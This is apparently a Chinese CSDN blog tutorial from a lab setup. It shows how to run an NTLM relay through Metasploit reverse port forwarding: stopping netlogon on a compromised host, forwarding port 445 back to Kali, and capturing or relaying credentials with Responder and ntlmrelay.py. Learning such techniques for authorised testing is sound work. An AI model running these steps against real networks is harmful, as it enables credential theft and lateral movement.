使用MSF端口转发代理Ntlm Relay

已于 2024-04-06 14:54:38 修改
阅读量176 收藏
点赞数 6
文章标签: 服务器 运维 MSF 端口转发 web安全 网络安全
于 2024-04-06 14:49:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/137427962
版权

我们可以通过使用MSF端口转发的功能来代理Ntlm Relay。

测试环境如下:

kali 192.168.213.149

我们这台kali机器是无法访问10.10.211.0/24这个网段的。

现在比如说我们拿到了win2016这台机器,需要来做Ntlm Relay的话,就需要端口转发了,这也算是第二种方式吧。

但是这种方式我感觉挺玄学的,有时候测试是可以成功的,但是有时候不行。

首先我们需要运行的所有服务以使其释放,如下命令。

sc stop netlogon

执行完成之后重启,那么你肯定想问实战中总不可能直接重启吧,这就是玄学所在,因为我尝试过没有重启也可以成功。

执行完成之后,我们做一个端口转发。

将目标的445端口转发到我们本地的445.

portfwd add -R -L 0.0.0.0 -l 445 -p 445

现在我们在DC这里也就是10.10.211.130这里使用dir进行触发。

dir \10.10.211.133\share

使用Responder进行监听。

这里指定的网卡是lo  也就是127.0.0.1 表示本地。

responder -I lo

当我们请求10.10.211.133的445端口的时候,他会转发到我们本地的445。

我们使用ntlmrelay.py也是一样的。

因为我这里只有两台机器,所以我们将中继给10.10.211.130 但是还是在10.10.211.130中触发。

当我们触发的时候可以看到已经有请求过来了。

如果感兴趣的话可以去测测关闭服务之后不重启看能不能生效。

Pluto-2003
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
msf使用方法
06-29
msf使用方法,很详细,你值得拥有
内网安全NTLM-Relay
qq_61553520的博客
01-28 1443
NTLM Hash,直接PTH;没有NTLM Hash,尝试抓取Net NTLM Hash,暴力破解明文密码,中继攻击。
深入分析域内ntlm relay to adcs服务的利用(含wireshark抓包分析)
m0_71746299的博客
01-27 255
前言 2021年中旬,specterops发布了一项针对域证书服务(adcs)的利用白皮书,文档中提到了19种对adcs服务的利用。本篇主要是分析文中提出的ntlm relay to adcs窃取证书的攻击流程,原理和抓包分析。 相关内容 ADCS介绍 Active Directory证书服务(Active Directory Certificate Services,下文简称ADCS)可以向用户,机构和服务颁发证书,收到证书的个体可以使用证书进行域内的身份认证,本篇中要利用的是ADCS配置的WEB证书请求
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4243
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
第十一期_MSF 后渗透《Metasploit Unleashed Simplified Chinese version(Metasploit官方文档教程中文版)》
Sno_WolF的博客
02-04 1740
十一、MSF 后渗透 在如此努力地成功利用一个系统之后,我们接下来该怎么办? 我们希望通过在从一个系统到另一个系统的过程中转向和覆盖我们的轨道来进一步访问目标内部网络。渗透测试人员还可以选择嗅探其他潜在受害者的数据包,编辑其注册表以获取更多信息或访问权限,或设置后门以维护更永久的系统访问。 利用这些技术将确保我们保持一定程度的访问权限,并有可能更深入地进入目标受信任的基础设施。 1. 权限提升 经常,尤其是客户端漏洞利用,您会发现您的会话只有有限的用户权限。这可能会严重限制您可以在远程系统上执行的操作,例如
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole(msf渗透神器)window版本,稀缺资源。
解读MSF团队管理的秘密
03-03
火龙果软件工程技术中心 俗话说“三个臭皮匠胜过诸葛亮”,但实际工作中出现的常常是“三个诸葛亮不如一个臭皮匠”。您的软件开发团队有这样的一些问题吗?日程安排一团糟、功能不合适、到处都是系统错误,而原因...
Linux repo包安装Nginx
weixin_43485737的博客
05-14 352
一般Nginx默认是安装在/etc/nginx 目录。
视频网站类如何选择服务器
wanhengwangluo的博客
05-18 369
随着互联网的快速发展,其中视频网站行业也变得更加的多样化,越来越多的人们使用视频软件,这极大的促进了视频行业的快速发展,企业为了能够呈现出流畅清晰的视频,就需要选择合适的服务器来保证后面正常的运行,那么视频网站类行业还怎样选择服务器呢?首先视频占用的容量会比较大,所以为了能够更好的调度文件传输,需要中上配置支持的服务器才能减少冗余,将各个部件进行紧密的结合,如果选择的服务器配置不够高的话,当用户访问量过多时,会超出服务器所能承载的范围,从而造成服务器崩溃。
Linux:iptables防火墙部署优化之路由转发(地址伪装)
最新发布
fox_kang的博客
05-20 333
准备工作:​ 1.已知node2的主机名称为node2.timinglee.org其ip为192.168.0.200​ 2.已知node1的主机名为node1.timinglee.org,此主机为双网卡主机其IP为172.25.254.200和192.168.0.100,请在此主机中配置策略可以使node2主机访问外网。
【MySQL精通之路】MySQL 8.0中添加、弃用或删除的服务器和状态变量及选项
Anakki的博客
05-16 310
欢迎大家关注专栏或者关注收藏我1.Mysql精通之路专栏: http://t.csdnimg.cn/4Rqp72.大家可以从这篇博客开始读,他是所有博客的根节点:【MySQL精通之路】详读MySQL8.0官方文档-CSDN博客MySQL 8.0中添加了以下系统变量、状态变量和服务器选项。 MySQL 8.0中删除了以下系统变量、状态变量和选项。
服务器通的远程桌面连接不上,关于服务器通畅但远程桌面连接不上问题的专业分析
day3ZY的博客
05-14 319
服务器通畅但远程桌面连接不上是一个常见的问题,可能涉及多个方面的因素。通过仔细检查防火墙和安全组设置、远程桌面服务配置、凭证配置以及网络配置,我们可以逐步定位并解决问题。检查服务器的网络配置,包括IP地址、子网掩码、网关等,确保没有冲突或错误。然而,有时会出现服务器网络通畅,但远程桌面无法连接的情况。这可能导致客户端无法成功建立连接。虽然服务器网络通畅,但可能存在网络配置错误,如IP地址冲突、子网掩码设置错误等,导致远程桌面连接失败。服务器的远程桌面服务可能未正确启用或配置,导致客户端无法连接到远程桌面。
Apache无法确定服务器的完全合格域名(FQDN)报错解决方法
par@ish的博客
05-17 282
在文件中找到全局配置区域(可能在文件的末尾或有注释指示的地方),添加或修改以下行来设置你的服务器的完全合格域名。完成上述步骤后,Apache在启动时就不会再显示那个警告信息了。这个配置有助于确保Apache正确识别其服务的域名,尤其是在处理基于域名的虚拟主机配置时尤为重要。,但具体的文件位置可能会根据你的Apache配置有所不同。要修复这个问题,你需要在Apache的主配置文件中手动设置。为你的服务器的实际完全合格域名或IP地址。)打开Apache的主配置文件。命令来查找相关的配置文件。
如何做好服务器数据防泄密
Canon_YK的博客
05-20 198
在这边就要使用专业的防泄密软件来实现这个效果,SDC沙盒防泄密系统是个不错的选择,员工端秉持着沙盒“只进不出”的概念完美实现了本地数据外泄的外泄这一需求,服务器端装上机密端,一是控制外部电脑和沙盒系统中电脑的联通,二是控制外接设备的连接,实现了服务器端只能有沙盒电脑访问。只有不断加强数据安全意识、采取合适的技术手段和管理措施,才能确保数据的安全性和保密性,为数字化时代的发展提供有力保障。此外,定期对数据进行审查和更新也是非常重要的,以避免过时的数据造成潜在的安全风险。
服务器使用Docker安装并注册GitLab Runner
卡卡西:一个擅长拷贝的前端程序员
05-20 213
centOs 使用Docker 安装并注册Gitlab Runner
linux查看网卡信息
beck_li的博客
05-18 222
1、 查看网卡硬件信息 2、 查看系统的所有网络接口 3、 查看某个网络接口的详细信息,例如eth0的详细参数和指标 4、 查看所有网卡的链路状态 5、列出所有pci设备
msf 指定session代理
06-06
你可以使用 `setg Proxies` 命令来设置 Metasploit Framework 中的所有会话的代理。例如,如果你想要将所有会话的代理设置为 `http://127.0.0.1:8080`,你可以使用以下命令: ``` setg Proxies http://127.0.0.1:8080 ``` 你也可以使用以下命令来将代理设置为 SOCKS5 代理: ``` setg Proxies socks5://127.0.0.1:1080 ``` 请注意,这些命令将在全局范围内设置代理,因此所有会话都将使用相同的代理。如果你只想为单个会话设置代理,你可以使用 `setg Proxies` 命令来设置 `Session` 选项,如下所示: ``` setg Proxies http://127.0.0.1:8080 Session <session_id> ``` 其中 `<session_id>` 是你要设置代理的会话的 ID。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值